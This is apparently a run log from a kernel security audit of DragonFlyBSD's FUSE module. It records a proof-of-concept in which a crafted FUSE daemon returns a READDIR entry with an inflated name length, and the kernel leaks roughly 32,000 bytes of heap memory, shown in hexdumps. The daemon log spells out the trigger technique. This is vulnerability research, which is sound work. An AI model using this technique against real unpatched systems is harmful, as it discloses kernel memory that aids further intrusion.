DragonFlyBSD Kernel Audit
DF-0781 / run.log
← back to finding ↓ download raw
=== BASELINE (unpatched fuse.ko) — leak fires ===
Kernel: DragonFly 6.5-DEVELOPMENT #0: Thu Jul  2 06:02:54 UTC 2026
fuse.ko: Id Refs Address                Size Name
10    1 0xffffffff82600000    a9000 fuse.ko

=== warmup run 1 ===
=== kernel wrote through user-buffer offset 32023 (bytes [0..32023]) ===
=== expected write size if namelen=32000 honored: _DIRENT_RECLEN(32000) = 32016 bytes ===
=== honored d_namlen = 32000 (daemon claimed 32000) ===
=== 72 non-zero non-marker bytes in window [24..32024) (past the 8-byte real name) ===
[LEAK-PROOF] kernel wrote 32024 bytes; d_namlen honored = 32000; real name bytes from daemon = 8; => 32000 bytes were read from past the daemon's reply buffer

=== DECISIVE RUN WITH FULL HEXDUMP ===
[trigger] opened /mnt/fuse fd=3, getdents(buf,65536)...
[trigger] getdents returned -1 (errno 22: Invalid argument)
=== kernel wrote through user-buffer offset 32023 (bytes [0..32023]) ===
=== expected write size if namelen=32000 honored: _DIRENT_RECLEN(32000) = 32016 bytes ===
=== first 1024 bytes hexdump ===
0200000000000000 007d080000000000 4142434445464748 a821628d00f8ffff
0800000000000000 0200000000000000 0000000000000000 007d000008000000
4142434445464748 010000000a000000 7023628d00f8ffff 7b23628d00f8ffff
72636e675f646863 7064006469736162 6c65640000000000 8820628d00f8ffff
1400000000000000 0200000000000000 0000000000000000 007d000008000000
4142434445464748 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000

=== honored d_namlen = 32000 (daemon claimed 32000) ===
=== 72 non-zero non-marker bytes in window [24..32024) (past the 8-byte real name) ===
=== 0 candidate kernel pointers found ===
=== leaked window hexdump (first 256 bytes past real name): ===
a821628d00f8ffff 0800000000000000 0200000000000000 0000000000000000
007d000008000000 4142434445464748 010000000a000000 7023628d00f8ffff
7b23628d00f8ffff 72636e675f646863 7064006469736162 6c65640000000000
8820628d00f8ffff 1400000000000000 0200000000000000 0000000000000000
007d000008000000 4142434445464748 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000000000

=== stride sample: every 256th byte of [0x18 .. 0x8000) ===
off=0x0018: a8
off=0x0118: 00
off=0x0218: 00
off=0x0318: 00
off=0x0418: 00
off=0x0518: 00
off=0x0618: 00
off=0x0718: 00
off=0x0818: 00
off=0x0918: 00
off=0x0a18: 00
off=0x0b18: 00
off=0x0c18: 00
off=0x0d18: 00
off=0x0e18: 00
off=0x0f18: 00
off=0x1018: 00
off=0x1118: 00
off=0x1218: 00
off=0x1318: 00
off=0x1418: 00
off=0x1518: 00
off=0x1618: 00
off=0x1718: 00
off=0x1818: 00
off=0x1918: 00
off=0x1a18: 00
off=0x1b18: 00
off=0x1c18: 00
off=0x1d18: 00
off=0x1e18: 00
off=0x1f18: 00
off=0x2018: 00
off=0x2118: 00
off=0x2218: 00
off=0x2318: 00
off=0x2418: 00
off=0x2518: 00
off=0x2618: 00
off=0x2718: 00
off=0x2818: 00
off=0x2918: 00
off=0x2a18: 00
off=0x2b18: 00
off=0x2c18: 00
off=0x2d18: 00
off=0x2e18: 00
off=0x2f18: 00
off=0x3018: 00
off=0x3118: 00
off=0x3218: 00
off=0x3318: 00
off=0x3418: 00
off=0x3518: 00
off=0x3618: 00
off=0x3718: 00
off=0x3818: 00
off=0x3918: 00
off=0x3a18: 00
off=0x3b18: 00
off=0x3c18: 00
off=0x3d18: 00
off=0x3e18: 00
off=0x3f18: 00
off=0x4018: 00
off=0x4118: 00
off=0x4218: 00
off=0x4318: 00
off=0x4418: 00
off=0x4518: 00
off=0x4618: 00
off=0x4718: 00
off=0x4818: 00
off=0x4918: 00
off=0x4a18: 00
off=0x4b18: 00
off=0x4c18: 00
off=0x4d18: 00
off=0x4e18: 00
off=0x4f18: 00
off=0x5018: 00
off=0x5118: 00
off=0x5218: 00
off=0x5318: 00
off=0x5418: 00
off=0x5518: 00
off=0x5618: 00
off=0x5718: 00
off=0x5818: 00
off=0x5918: 00
off=0x5a18: 00
off=0x5b18: 00
off=0x5c18: 00
off=0x5d18: 00
off=0x5e18: 00
off=0x5f18: 00
off=0x6018: 00
off=0x6118: 00
off=0x6218: 00
off=0x6318: 00
off=0x6418: 00
off=0x6518: 00
off=0x6618: 00
off=0x6718: 00
off=0x6818: 00
off=0x6918: 00
off=0x6a18: 00
off=0x6b18: 00
off=0x6c18: 00
off=0x6d18: 00
off=0x6e18: 00
off=0x6f18: 00
off=0x7018: 00
off=0x7118: 00
off=0x7218: 00
off=0x7318: 00
off=0x7418: 00
off=0x7518: 00
off=0x7618: 00
off=0x7718: 00
off=0x7818: 00
off=0x7918: 00
off=0x7a18: 00
off=0x7b18: 00
off=0x7c18: 00
off=0x7d18: 5a
off=0x7e18: 5a
off=0x7f18: 5a
[LEAK-PROOF] kernel wrote 32024 bytes; d_namlen honored = 32000; real name bytes from daemon = 8; => 32000 bytes were read from past the daemon's reply buffer

=== daemon log ===
[main] opened /dev/fuse fd=3
[daemon] serving on fd 3
[daemon] INIT major=7 minor=28 -> reply
[main] mounted fuse on /mnt/fuse (daemon pid 2144)
[main] now run: ./read_trigger /mnt/fuse   (triggers leak)
[daemon] READDIR node=root  REPLYING 48-byte pkt with dirent.namelen=32000 (only 8 real name bytes)  -> kernel will bcopy 32000 bytes from 8-byte name = LEAK 31992 bytes of kernel heap past reply buffer
[daemon] unhandled opcode 30
[daemon] READDIR node=root  REPLYING 48-byte pkt with dirent.namelen=32000 (only 8 real name bytes)  -> kernel will bcopy 32000 bytes from 8-byte name = LEAK 31992 bytes of kernel heap past reply buffer
[daemon] unhandled opcode 30

=== guest survived ===
10:53AM  up 37 mins, 0 users, load averages: 0.05, 0.01, 0.00